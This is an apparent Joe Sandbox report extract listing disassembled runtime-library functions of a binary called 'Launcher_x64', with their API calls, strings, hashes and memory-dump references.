Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a50e96063a7a32610a96aada5172f8ce247016b681aaeaf844048760dd7a47af
Instruction ID: 3b3b2a0a53eeed51e44078616cf7293e44cf32aa857e983f8c8a60b6df6d6164
Opcode Fuzzy Hash: a50e96063a7a32610a96aada5172f8ce247016b681aaeaf844048760dd7a47af
Instruction Fuzzy Hash: 1041B238A002189BCF10EF6CD885A9E7BA1EF45324F198155E859AB352D771EA01CFB2

Function 00D82E9C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf738a12c8ef120bdcaccad7852b1a7b9f9201c371029d06cddb61469c8d689
Instruction ID: 611d60a1b236edbc5d0d9e650fde31abdce939d2bd48a4ca5f400ba2e4f4b500
Opcode Fuzzy Hash: 8cf738a12c8ef120bdcaccad7852b1a7b9f9201c371029d06cddb61469c8d689
Instruction Fuzzy Hash: FCB10370A04349AFEB11EFA9C881BBEBBB5FF45B10F184258E51997392D7709A41CB70

Function 00D7446D Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D74464,00D6A97D,00D69BD4), ref: 00D7447B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D74489
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D744A2
SetLastError.KERNEL32(00000000,00D74464,00D6A97D,00D69BD4), ref: 00D744F4

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5f01d3e6689b96477237c2ec5e82e6e067a95666a1bc332b0e601c6bc4f3a67f
Instruction ID: 27668c365a16668fd51b1610f9fa088bc9c2a33a7cfb00d193f4ff9394e57a4f
Opcode Fuzzy Hash: 5f01d3e6689b96477237c2ec5e82e6e067a95666a1bc332b0e601c6bc4f3a67f
Instruction Fuzzy Hash: F101883210A3116EF7262779BC85A6B2B94EB41778B28833AF518951F5FF914C01A670

Function 00D74D4C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00D74E6B
CallUnexpected.LIBVCRUNTIME ref: 00D750E4

Strings

csm, xrefs: 00D74DF6
csm, xrefs: 00D74D89
csm, xrefs: 00D74EA2

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: aa79965707f20ab5208506f4bddb84597247b5257e2b50efbbab2174bade718f
Instruction ID: 07c35343a6df0caaca8df01867173df263c8bc8a7e0d0462df5e49a4ef2817ee
Opcode Fuzzy Hash: aa79965707f20ab5208506f4bddb84597247b5257e2b50efbbab2174bade718f
Instruction Fuzzy Hash: FCB17C31800219EFCF16DF94D8419AEB7B5FF04310B18855AF9186B216E7B1DA61CFB2

Function 00D6F1F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BFBEED24,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F22D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D6F23F
FreeLibrary.KERNEL32(00000000,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F261

Strings

CorExitProcess, xrefs: 00D6F237
mscoree.dll, xrefs: 00D6F226

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e63fedd86e2b76e82106d09fc20f444a364ce4514752a478c53925be17ee4a0c
Instruction ID: 450ec39a652cd495261d9672dc95dbe26bc31b3cbf07e6615cf0ff5d58ce8e43
Opcode Fuzzy Hash: e63fedd86e2b76e82106d09fc20f444a364ce4514752a478c53925be17ee4a0c
Instruction Fuzzy Hash: 12018F35964669EFDB019B50EC0ABAEBBB8FB44B15F040625E811E23D0DB749904CFA0

Function 00D76E2A Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00D76EAF
__alloca_probe_16.LIBCMT ref: 00D76F78
__freea.LIBCMT ref: 00D76FDF

Part of subcall function 00D756F1: RtlAllocateHeap.NTDLL(00000000,00D77675,?,?,00D77675,00000220,?,?,?), ref: 00D75723

__freea.LIBCMT ref: 00D76FF2
__freea.LIBCMT ref: 00D76FFF

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: d1bc91e7a264ae00e751d288437c385de5adcb372fdbc722624730b76de374c3
Instruction ID: cde01a86448bb64052969109a29847d4c287507c2000c9e06a044bb4961f635d
Opcode Fuzzy Hash: d1bc91e7a264ae00e751d288437c385de5adcb372fdbc722624730b76de374c3
Instruction Fuzzy Hash: 2051C172600A56AFEB219F64EC81EFBBAA9EF44754B198439FD0CD6150FB71DC1086B0

Function 00D677F2 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D677F9
std::_Lockit::_Lockit.LIBCPMT ref: 00D67804
std::_Lockit::~_Lockit.LIBCPMT ref: 00D67872

Part of subcall function 00D676EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D67707

std::locale::_Setgloballocale.LIBCPMT ref: 00D6781F
_Yarn.LIBCPMT ref: 00D67835

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: cae97618439fcc1a3ebf9be16cf1e0962fbee6e26498ccbc166a95722a759bd0
Instruction ID: ff328a141bef2c07463cd1d96ba741a74c40fe001eb9a12c0d9c46b7d841cd57
Opcode Fuzzy Hash: cae97618439fcc1a3ebf9be16cf1e0962fbee6e26498ccbc166a95722a759bd0
Instruction Fuzzy Hash: AC01BC79A046159BCB06EF20D84A97C7B76FF90354B09004AE80297381DF34AE02CFB1

Function 00D7F6B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D7F74C,00000000,?,00D91E20,?,?,?,00D7F683,00000004,InitializeCriticalSectionEx,00D890D4,00D890DC), ref: 00D7F6BD
GetLastError.KERNEL32(?,00D7F74C,00000000,?,00D91E20,?,?,?,00D7F683,00000004,InitializeCriticalSectionEx,00D890D4,00D890DC,00000000,?,00D7539C), ref: 00D7F6C7
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D7F6EF

Strings

api-ms-, xrefs: 00D7F6D4

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 4b6b66efdaef552814493662018621db916e351e4a95182b50e4c1508b8ff498
Instruction ID: 9649057d55f4aa738aeba20f2f7053ce65688110d35b410fc931d5824f72fe93
Opcode Fuzzy Hash: 4b6b66efdaef552814493662018621db916e351e4a95182b50e4c1508b8ff498
Instruction Fuzzy Hash: 27E01230250305BAEB312B61EC0AB5C3B949B00B51F244430F90CE81A0FBA299509EB5

Function 00D7D74E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BFBEED24,00000000,00000000,?), ref: 00D7D7B1

Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D7DA03
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D7DA49
GetLastError.KERNEL32 ref: 00D7DAEC

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 31c7f4c0adcb32c62f68f583b6b5b81c58c002ca9f1d1de5e0a465e81d617471
Instruction ID: 6b0872a12a3c1cfdac55e332845d70aeb28ba51a8759c91ad726652ece449012
Opcode Fuzzy Hash: 31c7f4c0adcb32c62f68f583b6b5b81c58c002ca9f1d1de5e0a465e81d617471
Instruction Fuzzy Hash: F9D16B75D042589FCF15CFA8C8809ADBBB6FF49314F28816AE45AEB351E730A941CB60

Function 00D74A73 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00D74B3A
___AdjustPointer.LIBCMT ref: 00D74B5D
___AdjustPointer.LIBCMT ref: 00D74BF9

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 848afbc038789c983303edabf5c9d1e30fb8589e26ef94b0d315bef32108477d
Instruction ID: bfa667a247651479553afdf958c157f4aa9a4968cd26a6be25c50837e22a2b81
Opcode Fuzzy Hash: 848afbc038789c983303edabf5c9d1e30fb8589e26ef94b0d315bef32108477d
Instruction Fuzzy Hash: CA51E1726052069FDB2A9F14D881BBAB7A8EF00311F28852DE94D57291F731EC40CBB0

Function 00D7B576 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862

GetLastError.KERNEL32 ref: 00D7B5DA
__dosmaperr.LIBCMT ref: 00D7B5E1
GetLastError.KERNEL32 ref: 00D7B61B
__dosmaperr.LIBCMT ref: 00D7B622

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 8eb4edbe76670798437dfbf930815999119a8a0f2cbb98fb73e2dabb95d2fb38
Instruction ID: d4b44ea25cc552eb20b3df6f088d9fcb9b0824aeefc29bb11e34a425429153d1
Opcode Fuzzy Hash: 8eb4edbe76670798437dfbf930815999119a8a0f2cbb98fb73e2dabb95d2fb38
Instruction Fuzzy Hash: 2A218B71600609AFDB20AF66C881AAFB7A9EF45374714C51AF95DDB650F731EC408BB0

Function 00D6CA12 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30bc071266a8cad1919b614ec4cdf2d44186c2b649272c0e64d176e2285040d
Instruction ID: a811b07d9530e115a03181b21f363b3c03ba9f0b37973264c242461864e21def
Opcode Fuzzy Hash: d30bc071266a8cad1919b614ec4cdf2d44186c2b649272c0e64d176e2285040d
Instruction Fuzzy Hash: 9C21C032220209AFDB21EFB5DC8197A77A8EF403687149619F899C7650F730EC40DBB0

Function 00D7C96E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00D7C976

Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7C9AE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7C9CE

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: ae46516e1912554e375e61fb6f2345ffcedf139e13d0cad184e2ad71d714f4de
Instruction ID: e6265269a883aea9115264ad3c363539889014eab3446e5dbe2a423df1cd5f94
Opcode Fuzzy Hash: ae46516e1912554e375e61fb6f2345ffcedf139e13d0cad184e2ad71d714f4de
Instruction Fuzzy Hash: 1D1126F29216097F6B1167766C8DC7F6AACDF843D53908018F90DD1200FB70CD008AB2

Function 00D84490 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000), ref: 00D844A7
GetLastError.KERNEL32(?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?,?,?,00D7D486,?), ref: 00D844B3

Part of subcall function 00D84510: CloseHandle.KERNEL32(FFFFFFFE,00D844C3,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?,?), ref: 00D84520

___initconout.LIBCMT ref: 00D844C3

Part of subcall function 00D844E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D84481,00D839CC,?,?,00D7DB40,?,00000000,00000000,?), ref: 00D844F8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?), ref: 00D844D8

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 8a48b0bb40f6d25b78cd578845cde7adcf9e030f59df84cf40782a228af6da3a
Instruction ID: 255697b9578e0053e714db808193c1074dad779bc5115dae3d3d3dd2f230679c
Opcode Fuzzy Hash: 8a48b0bb40f6d25b78cd578845cde7adcf9e030f59df84cf40782a228af6da3a
Instruction Fuzzy Hash: A8F0303A011226BBCF223FD5EC09A8E3F26FB493B0B054450FA18C5230D67288209FB4

Function 00D7A126 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D6F809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D7A1E5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D6F809,?,?,?,00000055,?,-00000050,?,?), ref: 00D7A21C

Strings

utf8, xrefs: 00D7A2EE

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: a116b71e8fe4b5fff891a44014fb931d777c88096c36ffc4a42583c2ac4f491c
Instruction ID: 45e9dde6864d156daa931f39507cda29745fcfc84825e2ad5fb95e333a7672ee
Opcode Fuzzy Hash: a116b71e8fe4b5fff891a44014fb931d777c88096c36ffc4a42583c2ac4f491c
Instruction Fuzzy Hash: 0851D771600705AAE725AFB8CC42BBE73A8EF85711F58842AF94D97181F670ED408B77

Function 00D75170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D75071,?,?,00000000,00000000,00000000,?), ref: 00D75195

Strings

MOC, xrefs: 00D751A7
RCC, xrefs: 00D751AF

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 0fec9516253b5116a0742f4f54cc233897fe926708235a6ae1ca10f8eec6740d
Instruction ID: b2b1ce5d5b8987740502310ad79eea20e904598d273e9f3bc3b8aa4d257547ae
Opcode Fuzzy Hash: 0fec9516253b5116a0742f4f54cc233897fe926708235a6ae1ca10f8eec6740d
Instruction Fuzzy Hash: DF41AC31900609EFCF15CF98DC81AEEBBB5FF08304F188199F90867216E3B1A950DB66

Function 00D749DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00D74C53

Strings

csm, xrefs: 00D74C75
csm, xrefs: 00D74CE6

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
